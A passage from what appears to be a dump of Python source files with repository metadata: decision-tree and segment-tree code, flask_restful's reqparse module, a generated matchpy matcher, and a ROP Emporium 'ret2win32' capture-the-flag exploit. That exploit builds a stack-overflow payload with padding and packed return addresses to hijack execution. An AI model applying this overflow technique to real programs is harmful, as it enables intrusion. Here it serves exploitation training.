    (attrIndex, threshold, operator.gt) candidates.
    """
    avPairs = set()
    for attrIndex in continuousAttrIndexes:
        sortedAttrValues = [i for i in sorted(data[rowIndex][attrIndex] for rowIndex in dataRowIndexes)]
        # Cap the number of thresholds: roughly sqrt(n), but at least
        # min(10, n) for small n.
        indexes = _get_discontinuity_indexes(
            sortedAttrValues = sortedAttrValues,
            maxIndexes = max(
                math.sqrt(len(sortedAttrValues)),
                min(10,len(sortedAttrValues))
            )
        )
        for index in indexes:
            avPairs.add((attrIndex, sortedAttrValues[index], operator.gt))
    return avPairs
def _get_discontinuity_indexes(sortedAttrValues, maxIndexes):
    """Collect at most ``maxIndexes`` discontinuity positions, center-out.

    Consumes the center-out generator and stops as soon as the requested
    number of indexes has been gathered.
    """
    picked = []
    for candidate in _generate_discontinuity_indexes_center_out(sortedAttrValues):
        picked.append(candidate)
        if not (len(picked) < maxIndexes):
            break
    return picked
def _generate_discontinuity_indexes_center_out(sortedAttrValues):
# print( "sortedAttrValues: " + str(sortedAttrValues) )
center = len(sortedAttrValues) // 2
left = center - 1
right = center + 1
while left >= 0 or right < len(sortedAttrValues):
if left >= 0:
if sortedAttrValues[left] != sortedAttrValues[left + 1]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(left)
# )
yield left
left -= 1
if right < len(sortedAttrValues):
if sortedAttrValues[right - 1] != sortedAttrValues[right]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(right - 1)
# )
yield right - 1
right += 1
def _get_bias(avPair, dataRowIndexes, data, outcomeIndex):
attrIndex, attrValue, isMatch = avPair
matchIndexes = {i for i in dataRowIndexes if isMatch(data[i][attrIndex], attrValue)}
nonMatchIndexes = dataRowIndexes - matchIndexes
matchOutcomes = {data[i][outcomeIndex] for i in matchIndexes}
nonMatchOutcomes = {data[i][outcomeIndex] for i in nonMatchIndexes}
numPureRows = (len(matchIndexes) if len( matchOutcomes) == 1 else 0) \
+ (len(nonMatchIndexes) if len(nonMatchOutcomes) == 1 else 0)
percentPure = numPureRows / len(dataRowIndexes)
numNonPureRows = len(dataRowIndexes) - numPureRows
percentNonPure = 1 - percentPure
split = 1 - abs(len(matchIndexes) - len(nonMatchIndexes)) / len(dataRowIndexes) - .001
splitBias = split * percentNonPure if numNonPureRows > 0 else 0
return splitBias + percentPure
class DTree:
    """Decision tree over a flat, id-ordered node list.

    A leaf is a ``(nodeId, outcome)`` pair; an interior node is the 8-tuple
    ``(nodeId, attrIndex, attrValue, isMatch, matchId, nonMatchId,
    matchCount, nonMatchCount)`` produced by ``build``.
    """

    def __init__(self, nodes, attrNames):
        self._nodes = nodes
        self._attrNames = attrNames

    @staticmethod
    def _is_leaf(node):
        # Leaves carry only (nodeId, outcome).
        return len(node) == 2

    def __str__(self):
        pieces = []
        for node in self._nodes:
            if self._is_leaf(node):
                pieces.append('{}: {}\n'.format(node[0], node[1]))
            else:
                (nodeId, attrIndex, attrValue, isMatch, nodeIdIfMatch,
                 nodeIdIfNonMatch, matchCount, nonMatchCount) = node
                pieces.append('{0}: {1}{7}{2}, {5} Yes->{3}, {6} No->{4}\n'.format(
                    nodeId, self._attrNames[attrIndex], attrValue,
                    nodeIdIfMatch, nodeIdIfNonMatch, matchCount,
                    nonMatchCount, '=' if isMatch == operator.eq else '>'))
        return ''.join(pieces)

    def get_prediction(self, data):
        """Walk from the root to a leaf and return that leaf's outcome."""
        node = self._nodes[0]
        while not self._is_leaf(node):
            _, attrIndex, attrValue, isMatch, matchId, nonMatchId = node[:6]
            nextId = matchId if isMatch(data[attrIndex], attrValue) else nonMatchId
            node = self._nodes[nextId]
        return node[1]
| [
"[email protected]"
] | |
2eff427266939ed01872e9d20210444fb49759ed | 7966fa31437cc8a539621a5a0642ce24c1c9de50 | /PycharmProjects/segmentTree/sgrTree.py | 29d3a3b49750c8b91cbbe7e14c980ac9783aa1fe | [] | no_license | crystal30/DataStructure | 4f938508f4c60af9c5f8ec5520d5acedbe2dc90e | c55b0cfd2967a2221c27ed738e8de15034775945 | refs/heads/master | 2021-06-25T17:49:03.048853 | 2021-01-22T00:37:04 | 2021-01-22T00:37:04 | 192,374,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,804 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
class SegTree():
    """Segment tree with range query and point update.

    The tree is stored in a flat array of size ``4 * len(data)``; node ``i``
    has its children at ``2*i + 1`` and ``2*i + 2``.  Child results are
    combined with :meth:`merger` (here plain ``+``, i.e. range sums for
    numbers).  Call :meth:`tree` once after construction to build the tree
    before using :meth:`query` or :meth:`set`.
    """

    def __init__(self, data):
        self.__data = data
        # 4*n slots always suffice for a segment tree over n leaves.
        self.__tree = [None]*len(data)*4

    def getSize(self):
        """Return the number of stored elements."""
        return len(self.__data)

    def getIndex(self, index):
        """Return the element stored at ``index``.

        Bug fix: the original body was ``return self.getIndex(index)``, which
        recursed on itself until RecursionError; it now reads the underlying
        data as intended.
        """
        return self.__data[index]

    def __leftChild(self, index):
        # Index of the left child node. (左孩子节点)
        return index*2 + 1

    def __rightChild(self, index):
        # Index of the right child node. (右孩子节点)
        return index*2 + 2

    def merger(self, a, b):
        """Combine two child results; here plain addition (range sums)."""
        return a+b

    def tree(self):
        """Build the tree for the current data."""
        self.__subTree(0, l=0, r=len(self.__data)-1)

    def __subTree(self, index, l, r):
        # Recursively build the node at `index`, which covers data[l..r].
        if l == r:
            self.__tree[index] = self.__data[l]
            return
        mid = (r+l) // 2
        lChild = self.__leftChild(index)
        rChild = self.__rightChild(index)
        self.__subTree(lChild, l, mid)
        self.__subTree(rChild, mid+1, r)
        self.__tree[index] = self.merger(self.__tree[lChild], self.__tree[rChild])

    def query(self, ql, qr):
        """Return the merged value over the closed range ``[ql, qr]``."""
        return self.__query(0, 0, len(self.__data)-1, ql, qr)

    def __query(self, treeIndex, l, r, ql, qr):
        # Node `treeIndex` covers [l, r]; answer the query for [ql, qr].
        if l == ql and r == qr:
            return self.__tree[treeIndex]
        leftChild = self.__leftChild(treeIndex)
        rightChild = self.__rightChild(treeIndex)
        mid = (l+r) // 2
        if qr <= mid:
            return self.__query(leftChild, l, mid, ql, qr)
        elif ql >= mid+1:
            return self.__query(rightChild, mid+1, r, ql, qr)
        # The query straddles the midpoint: merge the answers of both halves.
        leftRe = self.__query(leftChild, l, mid, ql, mid)
        rightRe = self.__query(rightChild, mid+1, r, mid+1, qr)
        return self.merger(leftRe, rightRe)

    def set(self, index, e):
        """Replace the element at ``index`` with ``e`` and refresh the tree."""
        self.__data[index] = e
        self.__set(0, 0, len(self.__data)-1, index, e)

    def __set(self, treeIndex, l, r, index, e):
        # Walk down to the leaf holding `index`, then re-merge on the way up.
        if l == r:
            self.__tree[treeIndex] = e
            return
        mid = l + (r-l)//2
        leftChild = self.__leftChild(treeIndex)
        rightChild = self.__rightChild(treeIndex)
        if index <= mid:
            self.__set(leftChild, l, mid, index, e)
        elif index >= mid+1:
            self.__set(rightChild, mid+1, r, index, e)
        self.__tree[treeIndex] = self.merger(self.__tree[leftChild], self.__tree[rightChild])

    def __str__(self):
        return str(self.__tree)
if __name__ == "__main__":
    # Smoke test: build a sum segment tree, query a range, update, re-print.
    nums = [-2, 0, 3, -5, 2, -1]
    seg = SegTree(nums)
    seg.tree()
    print(seg)
    print(seg.query(2,3))
    seg.set(2,5)
    print(seg)
| [
"[email protected]"
] | |
f849478cc7761ac222d66b2215c09ce091a114d9 | 6a0a634265957e9dcd26bc80e3304e107fb004d0 | /venvflask/lib/python3.7/site-packages/flask_restful/reqparse.py | 7c33f143a5e14cbfd098613fad892829efa31f54 | [] | no_license | ogutiann/PythonEthereumSmartContracts | 8bd81aa14eab567d41b5dad74b67aba92a405ebd | d870e9fd1c7f68b8493db4c2b2af224f966d8e51 | refs/heads/master | 2023-01-04T14:23:12.396898 | 2020-10-29T12:12:46 | 2020-10-29T12:12:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,660 | py | from copy import deepcopy
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
from flask import current_app, request
from werkzeug.datastructures import MultiDict, FileStorage
from werkzeug import exceptions
import flask_restful
import decimal
import six
class Namespace(dict):
    """A dict whose keys can also be read and written as attributes."""

    def __getattr__(self, name):
        if name in self:
            return self[name]
        raise AttributeError(name)

    def __setattr__(self, name, value):
        self[name] = value
# Human-readable names for each request location, used to phrase the
# "Missing required parameter in ..." error messages.
_friendly_location = {
    u'json': u'the JSON body',
    u'form': u'the post body',
    u'args': u'the query string',
    u'values': u'the post body or the query string',
    u'headers': u'the HTTP headers',
    u'cookies': u'the request\'s cookies',
    u'files': u'an uploaded file',
}

# Default argument type: coerce raw values to text (unicode on py2, str on py3).
text_type = lambda x: six.text_type(x)
class Argument(object):
    """
    :param name: Either a name or a list of option strings, e.g. foo or
        -f, --foo.
    :param default: The value produced if the argument is absent from the
        request.
    :param dest: The name of the attribute to be added to the object
        returned by :meth:`~reqparse.RequestParser.parse_args()`.
    :param bool required: Whether or not the argument may be omitted (optionals
        only).
    :param action: The basic type of action to be taken when this argument
        is encountered in the request. Valid options are "store" and "append".
    :param ignore: Whether to ignore cases where the argument fails type
        conversion
    :param type: The type to which the request argument should be
        converted. If a type raises an exception, the message in the
        error will be returned in the response. Defaults to :class:`unicode`
        in python2 and :class:`str` in python3.
    :param location: The attributes of the :class:`flask.Request` object
        to source the arguments from (ex: headers, args, etc.), can be an
        iterator. The last item listed takes precedence in the result set.
    :param choices: A container of the allowable values for the argument.
    :param help: A brief description of the argument, returned in the
        response when the argument is invalid. May optionally contain
        an "{error_msg}" interpolation token, which will be replaced with
        the text of the error raised by the type converter.
    :param bool case_sensitive: Whether argument values in the request are
        case sensitive or not (this will convert all values to lowercase)
    :param bool store_missing: Whether the arguments default value should
        be stored if the argument is missing from the request.
    :param bool trim: If enabled, trims whitespace around the argument.
    :param bool nullable: If enabled, allows null value in argument.
    """

    def __init__(self, name, default=None, dest=None, required=False,
                 ignore=False, type=text_type, location=('json', 'values',),
                 choices=(), action='store', help=None, operators=('=',),
                 case_sensitive=True, store_missing=True, trim=False,
                 nullable=True):
        self.name = name
        self.default = default
        self.dest = dest
        self.required = required
        self.ignore = ignore
        self.location = location
        self.type = type
        self.choices = choices
        self.action = action
        self.help = help
        self.case_sensitive = case_sensitive
        self.operators = operators
        self.store_missing = store_missing
        self.trim = trim
        self.nullable = nullable

    def __str__(self):
        # Abbreviate long choice lists: first three, an ellipsis, and the last.
        if len(self.choices) > 5:
            choices = self.choices[0:3]
            choices.append('...')
            choices.append(self.choices[-1])
        else:
            choices = self.choices
        return 'Name: {0}, type: {1}, choices: {2}'.format(self.name, self.type, choices)

    def __repr__(self):
        return "{0}('{1}', default={2}, dest={3}, required={4}, ignore={5}, location={6}, " \
               "type=\"{7}\", choices={8}, action='{9}', help={10}, case_sensitive={11}, " \
               "operators={12}, store_missing={13}, trim={14}, nullable={15})".format(
                   self.__class__.__name__, self.name, self.default, self.dest, self.required, self.ignore, self.location,
                   self.type, self.choices, self.action, self.help, self.case_sensitive,
                   self.operators, self.store_missing, self.trim, self.nullable)

    def source(self, request):
        """Pulls values off the request in the provided location
        :param request: The flask request object to parse arguments from
        """
        if isinstance(self.location, six.string_types):
            # Single location: return it directly (calling it if it is a method).
            value = getattr(request, self.location, MultiDict())
            if callable(value):
                value = value()
            if value is not None:
                return value
        else:
            # Multiple locations: merge them; later locations overwrite earlier.
            values = MultiDict()
            for l in self.location:
                value = getattr(request, l, None)
                if callable(value):
                    value = value()
                if value is not None:
                    values.update(value)
            return values

        return MultiDict()

    def convert(self, value, op):
        """Coerce a raw request value with ``self.type``, trying the richest
        converter signature first: (value, name, op), then (value, name),
        then (value)."""
        # Don't cast None
        if value is None:
            if self.nullable:
                return None
            else:
                raise ValueError('Must not be null!')

        # and check if we're expecting a filestorage and haven't overridden `type`
        # (required because the below instantiation isn't valid for FileStorage)
        elif isinstance(value, FileStorage) and self.type == FileStorage:
            return value

        try:
            return self.type(value, self.name, op)
        except TypeError:
            try:
                if self.type is decimal.Decimal:
                    # Decimal rejects floats pre-py3; convert via str first.
                    return self.type(str(value))
                else:
                    return self.type(value, self.name)
            except TypeError:
                return self.type(value)

    def handle_validation_error(self, error, bundle_errors):
        """Called when an error is raised while parsing. Aborts the request
        with a 400 status and an error message

        :param error: the error that was raised
        :param bundle_errors: do not abort when first error occurs, return a
            dict with the name of the argument and the error message to be
            bundled
        """
        error_str = six.text_type(error)
        error_msg = self.help.format(error_msg=error_str) if self.help else error_str
        msg = {self.name: error_msg}

        if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
            # Bundling: hand the error back to the parser instead of aborting.
            return error, msg
        flask_restful.abort(400, message=msg)

    def parse(self, request, bundle_errors=False):
        """Parses argument value(s) from the request, converting according to
        the argument's type.

        :param request: The flask request object to parse arguments from
        :param bundle_errors: Do not abort when first error occurs, return a
            dict with the name of the argument and the error message to be
            bundled
        """
        source = self.source(request)

        results = []

        # Sentinels
        _not_found = False
        _found = True

        for operator in self.operators:
            # e.g. operator ">=" looks up "<name>>" style keys; "=" is stripped.
            name = self.name + operator.replace("=", "", 1)
            if name in source:
                # Account for MultiDict and regular dict
                if hasattr(source, "getlist"):
                    values = source.getlist(name)
                else:
                    values = source.get(name)
                    if not (isinstance(values, MutableSequence) and self.action == 'append'):
                        values = [values]

                for value in values:
                    if hasattr(value, "strip") and self.trim:
                        value = value.strip()
                    if hasattr(value, "lower") and not self.case_sensitive:
                        value = value.lower()

                        # Lowercase the choices too so comparison stays fair.
                        if hasattr(self.choices, "__iter__"):
                            self.choices = [choice.lower()
                                            for choice in self.choices]

                    try:
                        value = self.convert(value, operator)
                    except Exception as error:
                        if self.ignore:
                            continue
                        return self.handle_validation_error(error, bundle_errors)

                    if self.choices and value not in self.choices:
                        if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
                            return self.handle_validation_error(
                                ValueError(u"{0} is not a valid choice".format(
                                    value)), bundle_errors)
                        self.handle_validation_error(
                            ValueError(u"{0} is not a valid choice".format(
                                value)), bundle_errors)

                    # Mark this argument as consumed (for strict parsing).
                    if name in request.unparsed_arguments:
                        request.unparsed_arguments.pop(name)
                    results.append(value)

        if not results and self.required:
            if isinstance(self.location, six.string_types):
                error_msg = u"Missing required parameter in {0}".format(
                    _friendly_location.get(self.location, self.location)
                )
            else:
                friendly_locations = [_friendly_location.get(loc, loc)
                                      for loc in self.location]
                error_msg = u"Missing required parameter in {0}".format(
                    ' or '.join(friendly_locations)
                )
            if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
                return self.handle_validation_error(ValueError(error_msg), bundle_errors)
            self.handle_validation_error(ValueError(error_msg), bundle_errors)

        if not results:
            # Absent and not required: fall back to the (possibly callable) default.
            if callable(self.default):
                return self.default(), _not_found
            else:
                return self.default, _not_found

        if self.action == 'append':
            return results, _found

        if self.action == 'store' or len(results) == 1:
            return results[0], _found
        return results, _found
class RequestParser(object):
    """Enables adding and parsing of multiple arguments in the context of a
    single request. Ex::

        from flask_restful import reqparse
        parser = reqparse.RequestParser()
        parser.add_argument('foo')
        parser.add_argument('int_bar', type=int)
        args = parser.parse_args()

    :param bool trim: If enabled, trims whitespace on all arguments in this
        parser
    :param bool bundle_errors: If enabled, do not abort when first error occurs,
        return a dict with the name of the argument and the error message to be
        bundled and return all validation errors
    """

    def __init__(self, argument_class=Argument, namespace_class=Namespace,
                 trim=False, bundle_errors=False):
        self.args = []
        self.argument_class = argument_class
        self.namespace_class = namespace_class
        self.trim = trim
        self.bundle_errors = bundle_errors

    def add_argument(self, *args, **kwargs):
        """Adds an argument to be parsed.

        Accepts either a single instance of Argument or arguments to be passed
        into :class:`Argument`'s constructor.

        See :class:`Argument`'s constructor for documentation on the
        available options.
        """
        if len(args) == 1 and isinstance(args[0], self.argument_class):
            self.args.append(args[0])
        else:
            self.args.append(self.argument_class(*args, **kwargs))

        # Do not know what other argument classes are out there
        if self.trim and self.argument_class is Argument:
            # enable trim for appended element
            self.args[-1].trim = kwargs.get('trim', self.trim)

        return self

    def parse_args(self, req=None, strict=False, http_error_code=400):
        """Parse all arguments from the provided request and return the results
        as a Namespace

        :param req: Can be used to overwrite request from Flask
        :param strict: if req includes args not in parser, throw 400 BadRequest exception
        :param http_error_code: use custom error code for `flask_restful.abort()`
        """
        if req is None:
            req = request

        namespace = self.namespace_class()

        # A record of arguments not yet parsed; as each is found
        # among self.args, it will be popped out
        req.unparsed_arguments = dict(self.argument_class('').source(req)) if strict else {}
        errors = {}
        for arg in self.args:
            value, found = arg.parse(req, self.bundle_errors)
            if isinstance(value, ValueError):
                # Bundled validation failure: collect it and keep going.
                errors.update(found)
                found = None
            if found or arg.store_missing:
                namespace[arg.dest or arg.name] = value
        if errors:
            flask_restful.abort(http_error_code, message=errors)

        if strict and req.unparsed_arguments:
            raise exceptions.BadRequest('Unknown arguments: %s'
                                        % ', '.join(req.unparsed_arguments.keys()))

        return namespace

    def copy(self):
        """ Creates a copy of this RequestParser with the same set of arguments """
        parser_copy = self.__class__(self.argument_class, self.namespace_class)
        parser_copy.args = deepcopy(self.args)
        parser_copy.trim = self.trim
        parser_copy.bundle_errors = self.bundle_errors
        return parser_copy

    def replace_argument(self, name, *args, **kwargs):
        """ Replace the argument matching the given name with a new version. """
        new_arg = self.argument_class(name, *args, **kwargs)
        for index, arg in enumerate(self.args[:]):
            if new_arg.name == arg.name:
                del self.args[index]
                self.args.append(new_arg)
                break
        return self

    def remove_argument(self, name):
        """ Remove the argument matching the given name. """
        for index, arg in enumerate(self.args[:]):
            if name == arg.name:
                del self.args[index]
                break
        return self
| [
"[email protected]"
] | |
f16a59cbded9413a22d9a9d7d5816f14d3b4749e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005112.py | f6ccb551e9b49171345708249fe74b4524d23c9a | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,369 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher13068(CommutativeMatcher):
    # Machine-generated matchpy many-to-one matcher (part of the rubi_generated
    # pattern tables); NOTE(review): do not edit the state machine by hand.
    _instance = None
    # Pattern 0: one fixed subpattern plus one sequence variable collected
    # under the commutative/associative operation Mul.
    patterns = {
        0: (0, Multiset({0: 1}), [
            (VariableWithCount('i2.2.1.1.1.0', 1, 1, S(1)), Mul)
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()

    def __init__(self):
        self.add_subject(None)

    @staticmethod
    def get():
        # Lazily-constructed singleton accessor.
        if CommutativeMatcher13068._instance is None:
            CommutativeMatcher13068._instance = CommutativeMatcher13068()
        return CommutativeMatcher13068._instance

    @staticmethod
    def get_match_iter(subject):
        # Generated state machine.  Matches subjects of the form sqrt(v) — a
        # Pow whose second operand is Rational(1, 2) — yielding
        # (pattern index, substitution) pairs.  Popped subjects are pushed
        # back (appendleft) before leaving each state so the deques are
        # restored for the caller.
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 13067
        if len(subjects) >= 1 and isinstance(subjects[0], Pow):
            tmp1 = subjects.popleft()
            subjects2 = deque(tmp1._args)
            # State 13069
            if len(subjects2) >= 1:
                tmp3 = subjects2.popleft()
                subst1 = Substitution(subst0)
                try:
                    subst1.try_add_variable('i2.2.1.1.1.1', tmp3)
                except ValueError:
                    pass
                else:
                    pass
                    # State 13070
                    if len(subjects2) >= 1 and subjects2[0] == Rational(1, 2):
                        tmp5 = subjects2.popleft()
                        # State 13071
                        if len(subjects2) == 0:
                            pass
                            # State 13072
                            if len(subjects) == 0:
                                pass
                                # 0: sqrt(v)
                                yield 0, subst1
                        subjects2.appendleft(tmp5)
                subjects2.appendleft(tmp3)
            subjects.appendleft(tmp1)
        return
        yield
from collections import deque | [
"[email protected]"
] | |
07684dae8331e4090c1d7c0b30f6d7355bdf19e3 | 0a3627e849caf21a0385079dea5bf81d4a281b72 | /ret2win32/pwngetshell.py | b3855cdd460b10fec5f32763e9e33a89877fc403 | [] | no_license | surajsinghbisht054/ROP-Emporium-walkthrough-collection | 7e0b3e4aadb4bf4a901c3788fe9fe8a56d047f0d | 4e9ac3f732c6af5ae5fd65e6ca7e3964fc8a3790 | refs/heads/master | 2020-04-14T13:45:04.356322 | 2019-01-02T19:01:39 | 2019-01-02T19:01:39 | 163,877,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,283 | py | #!/usr/bin/python
from struct import pack
import pwn
# ==================================================
# Usages: (python exp.py; cat) | ./binaryName
# =================================================
#+ ------------------------------------------------------------------ +
#= +----------------------------------------------------------------+ =
#= | | =
#= | _____ ___________ _____ | =
#= | / ___/ ___| ___ \ | __ \ | =
#= | \ `--.\ `--.| |_/ / | | \/_ __ ___ _ _ _ __ | =
#= | `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \ | =
#= | /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) | | =
#= | \____/\____/\____/ \____/_| \___/ \__,_| .__/ | =
#= | | | | =
#= | |_| | =
#= +----------------------------------------------------------------+ =
#= +----------------------------------------------------------------+ =
#= | | =
#= | [email protected] | =
#= | www.bitforestinfo.com | =
#= | | =
#= | Try Smart, Try Hard & Don't Cheat | =
#= +----------------------------------------------------------------+ =
#+ ------------------------------------------------------------------ +
#pwn.context.log_level='debug'
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
# 004 0x00000430 0x08048430 GLOBAL FUNC 16 imp.system
# ?v reloc.fgets
# 0x804a010
#
#
#
# ?v reloc.puts
# 0x804a014
#
# ?v sym.pwnme
# 0x80485f6
#
# ?v sym.imp.puts
# 0x8048420
# 32-bit x86 ROP payload (Python 2 script).  Addresses come from the radare2
# notes above; presumably a non-PIE binary — confirm before reuse.
t_function = 0x08048400 # printf
args = 0x8048710
# Fake call frame appended after the overflow: target address, a dummy return
# address for it, then its first argument.
load = ''
load += pack('I',t_function)
load += 'AAAA' #pack('I', )
load += pack('I', args )
# Buffer
pay = ''
pay += 'A'*40
pay += 'BBBB' # EBP
pay += load # EIP
print pay
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
#b.sendline(pay)
#print pwn.hexdump(b.readall())
#pwn.gdb.attach(b)
#b.interactive()
| [
"[email protected]"
] | |
c6a7fbd32d85a9e5f274cc76bf525b7c4eb7bf77 | 33febf8b617ef66d7086765f1c0bf6523667a959 | /probpy/distributions/uniform.py | 3b06514b722dc180d8f041489b3cc970add316b3 | [] | no_license | JonasRSV/probpy | 857201c7f122461463b75d63e5c688e011615292 | 5203063db612b2b2bc0434a7f2a02c9d2e27ed6a | refs/heads/master | 2022-07-07T06:17:44.504570 | 2020-04-15T14:52:20 | 2020-04-15T14:52:20 | 245,820,195 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,578 | py | import numpy as np
import numba
from typing import Tuple
from probpy.core import Distribution, RandomVariable, Parameter
class Uniform(Distribution):
    """Uniform Distribution"""
    # Keys under which the bounds are stored in RandomVariable.parameters.
    a = "a"
    b = "b"

    @classmethod
    def med(cls, a: float = None, b: float = None) -> RandomVariable:
        """
        :param a: lower bound
        :param b: upper bound
        :return: RandomVariable

        Any bound left as None stays free and becomes an argument of the
        returned random variable's sample/p functions.
        (Annotations changed from the removed ``np.float`` alias to ``float``.)
        """
        if a is None and b is None:
            _sample = Uniform.sample
            _p = Uniform.p
        elif a is None:
            def _sample(a: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
            def _p(x: np.ndarray, a: np.ndarray): return Uniform.p(x, a, b)
        elif b is None:
            def _sample(b: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
            def _p(x: np.ndarray, b: np.ndarray): return Uniform.p(x, a, b)
        else:
            def _sample(size: int = 1): return Uniform.sample(a, b, size)
            def _p(x: np.ndarray): return Uniform.p(x, a, b)

        parameters = {
            Uniform.a: Parameter((), a),
            Uniform.b: Parameter((), b)
        }

        return RandomVariable(_sample, _p, shape=(), parameters=parameters, cls=cls)

    @staticmethod
    @numba.jit(nopython=False, forceobj=True)
    def sample(a: float, b: float, size: int = 1) -> np.ndarray:
        # Draw `size` samples from U(a, b).
        return np.array(a + np.random.rand(size) * (b - a))

    @staticmethod
    @numba.jit(nopython=True, forceobj=False)
    def fast_p(x: np.ndarray, a: float, b: float):
        # Density: 1/(b - a) strictly inside (a, b), 0 elsewhere.
        return ((a < x) & (x < b)) / (b - a)

    @staticmethod
    def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
        # Coerce scalars/lists to ndarrays before calling the jitted kernel.
        if type(x) != np.ndarray: x = np.array(x)
        if type(a) != np.ndarray: a = np.array(a)
        if type(b) != np.ndarray: b = np.array(b)
        return Uniform.fast_p(x, a, b)

    @staticmethod
    def jit_probability(rv: RandomVariable):
        # Return a jitted density specialized for whichever bounds are fixed
        # on rv; free bounds remain arguments of the returned function.
        a = rv.parameters[Uniform.a].value
        b = rv.parameters[Uniform.b].value

        _fast_p = Uniform.fast_p
        if a is None and b is None:
            return _fast_p
        elif a is None:
            def fast_p(x: np.ndarray, a: float):
                return _fast_p(x, a, b)
        elif b is None:
            def fast_p(x: np.ndarray, b: float):
                return _fast_p(x, a, b)
        else:
            def fast_p(x: np.ndarray):
                return _fast_p(x, a, b)

        fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
        return fast_p
class MultiVariateUniform(Distribution):
    """Multivariate Uniform distribution over an axis-aligned box."""
    # Keys under which the bounds are stored in RandomVariable.parameters.
    a = "a"
    b = "b"

    @classmethod
    def med(cls, a: np.ndarray = None, b: np.ndarray = None, dimension: Tuple = None) -> RandomVariable:
        """
        :param a: lower bound (one entry per dimension)
        :param b: upper bound (one entry per dimension)
        :param dimension: dimension of r.v (only used when both bounds are free)
        :return: RandomVariable

        Any bound left as None stays free and becomes an argument of the
        returned random variable's sample/p functions.
        """
        if a is None and b is None:
            _sample = MultiVariateUniform.sample
            _p = MultiVariateUniform.p
            shape = dimension
        elif a is None:
            def _sample(a: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
            def _p(x: np.ndarray, a: np.ndarray): return MultiVariateUniform.p(x, a, b)
            shape = b.size
        elif b is None:
            def _sample(b: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
            def _p(x: np.ndarray, b: np.ndarray): return MultiVariateUniform.p(x, a, b)
            shape = a.size
        else:
            def _sample(size: int = 1): return MultiVariateUniform.sample(a, b, size)
            def _p(x: np.ndarray): return MultiVariateUniform.p(x, a, b)
            shape = a.size

        parameters = {
            MultiVariateUniform.a: Parameter(shape, a),
            MultiVariateUniform.b: Parameter(shape, b)
        }

        return RandomVariable(_sample, _p, shape=shape, parameters=parameters, cls=cls)

    @staticmethod
    def sample(a: np.ndarray, b: np.ndarray, size: int = 1) -> np.ndarray:
        """Draw ``size`` points uniformly from the box spanned by a and b."""
        return a + np.random.rand(size, a.size) * (b - a)

    @staticmethod
    @numba.jit(nopython=True, fastmath=True, forceobj=False)
    def fast_p(x: np.ndarray, a: np.ndarray, b: np.ndarray):
        # Constant density 1/volume strictly inside the box, 0 elsewhere.
        indicator_matrix = ((a < x) & (x < b))
        indicator_vector = np.array([np.all(indicator_matrix[i]) for i in range(len(x))])
        probability = 1 / np.prod(b - a)
        return indicator_vector * probability

    @staticmethod
    def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
        """Density of each row of ``x``; scalars/lists are coerced to arrays
        and a single point is promoted to a one-row matrix."""
        if type(x) != np.ndarray: x = np.array(x)
        if type(a) != np.ndarray: a = np.array(a)
        if type(b) != np.ndarray: b = np.array(b)
        if x.ndim == 1: x = x.reshape(-1, a.size)
        return MultiVariateUniform.fast_p(x, a, b)

    @staticmethod
    def jit_probability(rv: RandomVariable):
        # Return a jitted density specialized for whichever bounds are fixed.
        # Consistency fix: read this class's own parameter keys — the original
        # used Uniform.a / Uniform.b, which only worked because the key
        # strings happen to coincide.
        a = rv.parameters[MultiVariateUniform.a].value
        b = rv.parameters[MultiVariateUniform.b].value

        _fast_p = MultiVariateUniform.fast_p
        if a is None and b is None:
            return _fast_p
        elif a is None:
            def fast_p(x: np.ndarray, a: np.ndarray):
                return _fast_p(x, a, b)
        elif b is None:
            def fast_p(x: np.ndarray, b: np.ndarray):
                return _fast_p(x, a, b)
        else:
            def fast_p(x: np.ndarray):
                return _fast_p(x, a, b)

        fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
        return fast_p
| [
"[email protected]"
] | |
7918ac56d5849d5397eee17e699ba9a45cf94e5f | b2c896ca9f2acb81115708ce6cf8d01396e71a18 | /capybara/tests/session/element/test_matches_selector.py | ff60142d44cd19b211832859a9ff8d2200284aea | [
"MIT"
